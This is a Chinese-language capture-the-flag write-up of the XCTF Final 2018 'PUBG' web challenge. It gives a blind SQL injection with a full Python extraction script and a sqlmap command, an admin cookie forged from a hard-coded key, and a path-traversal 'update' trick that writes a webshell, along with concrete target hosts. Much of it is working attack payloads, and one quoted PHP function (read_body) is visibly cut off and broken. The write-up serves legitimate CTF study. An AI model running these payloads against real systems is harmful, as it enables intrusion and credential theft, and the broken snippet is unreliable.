设为首页收藏本站
开启辅助访问

XCTF Final Web2 Writeup

 您所在的位置:网站首页 linecode 107 XCTF Final Web2 Writeup

XCTF Final Web2 Writeup

#XCTF Final Web2 Writeup| 来源: 网络整理| 查看: 265

BUPG

赛题提供了源码 https://github.com/aye-whitehat/CTF-Collection/blob/master/XCTF%20Final%202018/web/PUBG/www.zip

但是zend加密了,比赛时我们De1ta只解密了部分关键文件,这里感谢提供r3kpig的全部解密文件,大部分队伍都是付费解密的,而且解密后混淆的代码也挺恶心的。。。 https://github.com/aye-whitehat/CTF-Collection/blob/master/XCTF%20Final%202018/web/PUBG/DECODE.zip

环境还没关,复现记得修改下host 159.138.22.212 guaika.txmeili.com

这题我们在比赛的时候利用的漏洞链是:sql注入+cookie伪造+后台getshell

解题思路 sql注入

代码位于 kss_inc/payapi_return2.php 关键代码: 这里的post参数没有调用该框架的sql过滤器,只是进行简单的trim()处理

else if ( $_obfuscate_kYyPkY_PkJKVh4qGjJGIio4� == "e138" ) { $_obfuscate_kpGPh4mNh46SkZONh4eLlJU� = ""; $_obfuscate_k42NkY2RkoiNjJCKlZSKiIg� = trim( $_POST['SerialNo'] ); $_obfuscate_iJWMjIiVi5OGjJOViY2Li48� = $_obfuscate_k42NkY2RkoiNjJCKlZSKiIg�; $_obfuscate_iIuQkYaUioqGlI6IjIuMiI8� = trim( $_POST['Status'] ); $_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU� = trim( $_POST['Money'] ); $_obfuscate_lIuQk5OGjpKVjY6UiI_QjJM� = $_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU�; $_obfuscate_iImJjYmQjYyOjIuVkIuMjIs� = trim( $_POST['VerifyString'] );

VerifyString的计算规则

else if ( $_obfuscate_kYyPkY_PkJKVh4qGjJGIio4� == "e138" ) { $_obfuscate_k4mJh5SPkY6Vh4qHjIaJh44� = TRUE; if ( $_obfuscate_iImJjYmQjYyOjIuVkIuMjIs� != strtolower( md5( "SerialNo=".$_obfuscate_k42NkY2RkoiNjJCKlZSKiIg�."&UserID=".$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138set']."&Money=".$_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU�."&Status=".$_obfuscate_iIuQkYaUioqGlI6IjIuMiI8�."&AttachString=e138&MerchantKey=".$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138key'] ) ) ) { $_obfuscate_k4mJh5SPkY6Vh4qHjIaJh44� = FALSE; }

因为设置了AttachString=e138 所以$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138set']值为1 所以VerifyString的值为strtolower(md5('SerialNo=1&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1')) 即为ebd95c4233e8c02fe0854306afd71bee

但其实我们只要把参数都找到就ok了,因为不会先验证VerifyString,而是先验证SerialNo和Money参数

造成sql注入的代码如下:

$_obfuscate_lZGQj4iOj4mTlZGNjZGUj5E� = $_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_iY6OkJCRkY2PjpCPk5CRkJA�( "select * from kss_tb_order where ordernum='".$_obfuscate_iJWMjIiVi5OGjJOViY2Li48�."'" );

payload: http://guaika.txmeili.com:8888/kss_inc/payapi_return2.php 注入点在SerialNo

SerialNo=0'or(0)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee SerialNo=1'or(1)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee image.png image.png

尝试注入得到admin的密码 kss_inc/db_function.php 中可以看到登陆逻辑

if ( empty( $_obfuscate_lIqUlIaMj4aNjJCRkoeJlJE� ) ) { $_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k� = $_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_iY6OkJCRkY2PjpCPk5CRkJA�( "select * from kss_tb_manager where id=1" ); if ( $_obfuscate_lIqUlIaMj4aNjJCRkoeJlJE� != md5( $_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k�['username'].$_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k�['password'] ) ) { _obfuscate_kYyOhouLjo2Gh4eNj4iQlIg�( "你的原始身份效验失败!" ); } $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['level'] = 9; $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['powerlist'] = "admin"; }

表名是 kss_tb_manager,字段是username和password,id是1

注入脚本 aye.py

#! coding:utf-8 import requests import sys if sys.getdefaultencoding() != 'utf-8': reload(sys) sys.setdefaultencoding('utf-8') def main(): url="http://guaika.txmeili.com:8888/kss_inc/payapi_return2.php" chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. ' result='' for i in range(1,1000): i =str(i) for j in chars: j=ord(j) #SerialNo=0'or(1)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee payload = """0'or(ascii(substr((select(concat(username,0x3a,password))from(kss_tb_manager)where(id=1)),%s,1))=%s)#"""%(i,j) data = {'SerialNo': payload, 'UserID' : 1, 'Money' : 100, 'Status' : 1, 'AttachString' : 'e138', 'MerchantKey' : 1, 'VerifyString' : 'ebd95c4233e8c02fe0854306afd71bee', } #print payload do_whlie = True while do_whlie: try: r=requests.post(url,data=data) if r.status_code == 200: do_whlie = False except Exception as e: print str(e) #print r.text if '订单金额不符' in r.text: result += chr(j) #print r.text print result if __name__ == "__main__": main()

image.png 得到账号密码: axing:8ccf03839a8c63a3a9de17fa5ac6a192 密码在somd5解密得到axing147258 但是登陆不了。。。。赛后跟出题人交流才知道,他把管理员的密码和安全码最后一个字节改了,坑爹的是cmd5和somd5只是取了md5中间的16位进行相似匹配,允许误差 image.png image.png 所以数据库92结尾的md5是反解不了的

这里也可以用sqlmap直接跑,就是要加上一些参数,不然跑不出来 sqlmap -r burp.txt -p SerialNo --dbms mysql --risk 3 --level 5 --string="订单金额不符" --technique B

POST /kss_inc/payapi_return2.php HTTP/1.1 Host: guaika.txmeili.com:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 123 SerialNo=0&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee cookie伪造 位于kss_inc/function.php

有setcookie_function(包含禁ip的逻辑)

function _obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs� ) { setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�, 0, "/", NULL, NULL, TRUE ); if ( BINDIP == 1 ) { setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY._obfuscate_jZKKjpCGkZSUj4aOiIePlZI�( ) ), 0, "/", NULL, NULL, TRUE ); } else { setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY ), 0, "/", NULL, NULL, TRUE ); } return $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY; } 位于kss_admin/index.php

调用了setcookie_function _obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( "kss_manager", $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� );

$_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_kpSOj5KVio2Hj4uKj4_KjIY�( "update kss_tb_manager set `linecode`='".$_obfuscate_kI6PjYmLhpGMk4qGjZSHlIg�."',`lastlogintime`='"._obfuscate_jZGJkpOSkY_HiY2HjY2JlIg�( )."',`lastloginip`=".$_obfuscate_kYmJjZOIiZKJioqMkoaGiYk�." where `id`=".$_obfuscate_kY_OlYeUlIiVjo6Hio_MkpI�['id'], "notsync" ); $_obfuscate_i4mRjZCJlZCGk4_UioyHk4k�['logintype'] = 1; _obfuscate_jYuKk4uOiYmSkpOTj5GUlZA�( $_obfuscate_i4mRjZCJlZCGk4_UioyHk4k� ); $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� = $_obfuscate_kY_OlYeUlIiVjo6Hio_MkpI�['id'].",".$_obfuscate_h4eSk4uGiZCKhoyNkIiTlI8�.",".md5( $_obfuscate_jZOIiIiJkJOGiY_KjoaGh4c� ).",".$_obfuscate_kI6PjYmLhpGMk4qGjZSHlIg�; _obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( "kss_manager", $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� );

其实就是调用了 setcookie_function( "kss_manager",$id.",".$username.",".md5($password).",".$linecode"

然后执行两句setcookie,得到kss_manager和kss_manager_ver两个cookie

setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�, 0, "/", NULL, NULL, TRUE ); setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY ), 0, "/", NULL, NULL, TRUE )

并且在 kss_inc/_config.php找到$COOKKEY的值 XIpCcfoe_y43

define( "COOKKEY", "XIpCcfoe_y43" ); define( "COOKKEY2", "MGHOu2m|oXDz" );

也在 kss_inc/db_function.php 找到了$linecode的值 efefefef

if ( $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['linecode'] != $_obfuscate_h4_NjYiIi46Lh5KHkoaKkZQ�[3] && "efefefef" != $_obfuscate_h4_NjYiIi46Lh5KHkoaKkZQ�[3] && $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['username'] != "test01" ) { _obfuscate_kYyOhouLjo2Gh4eNj4iQlIg�( "您的帐号被挤下线,请重新登陆" ); }

所以最终的两个cookie的键值分别是

kss_manager 1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef kss_manager_ver md5("1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef"."XIpCcfoe_y43") 即为 md5("1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefefXIpCcfoe_y43") 即为 b05a94ffcb3da369a828235012990953

成功伪造cookie,访问 kss_admin/admin.php

image.png

浏览器替换cookie

image.png 后台getshell

代码位于 kss_admin/admin_update

这个网站的更新,是从远端主站拉取代码写入本地:

$_obfuscate_koiKkIiPjI6UkYeRlIqNhoc� = _obfuscate_lY6Gk5KMkYmPjIyPhpCOlYc�( "http://api.hphu.com/import/".$_obfuscate_koaSiYqGjIqMiZSLk4uGiZU�.".php?phpver=".PHP_VERSION."&webid=".WEBID."&rid=".time( ), 300 );

我们跟入_obfuscate_lY6Gk5KMkYmPjIyPhpCOlYc�函数 位于第20行,函数中有curl相关的操作

curl_setopt( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, CURLOPT_HEADERFUNCTION, "read_header" ); curl_setopt( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, CURLOPT_WRITEFUNCTION, "read_body" );

看下read_body函数

function read_body( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� ) { global $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo�; global $_obfuscate_j4eNjZOQlIuKhoqMj4mOjYs�; global $_obfuscate_koaSiYqGjIqMiZSLk4uGiZU�; if ( $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo� == 0 && substr( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, 0, 2 ) == "$('#downsize').html('".$_obfuscate_ko6MhoiQkJKRlYeVio_JjYo�."');"; echo "\r\n"; ob_flush( ); flush( ); return strlen( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� ); }

其中read_body函数会将curl到的内容写到 kss_tool/_webup.php

file_put_contents( KSSROOTDIR."kss_tool".DIRECTORY_SEPARATOR."_webup.php", $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, FILE_APPEND );

这里我们可以利用代码中的sql过滤器,去触发某个页面的sql报错,从而将php代码回显,从而将恶意代码写入kss_tool/_webup.php,构造webshell

例子:

构造sql报错并回显 http://api.hphu.com/test/kss_admin/index.php?action=aye666%27 image.png 构造更新路径

将报错的页面内容写入 kss_tool/_webup.php

http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action=aye666%27 image.png 触发phpinfo http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action=' image.png 写shell http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action='

image.png image.png 连接菜刀:http://guaika.txmeili.com:8888/kss_tool/_webup.php

image.png get flag image.png 总结

膜拜出题人rr师傅 膜拜De1ta的web师傅们 混淆代码的审计,真TM恶心



【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3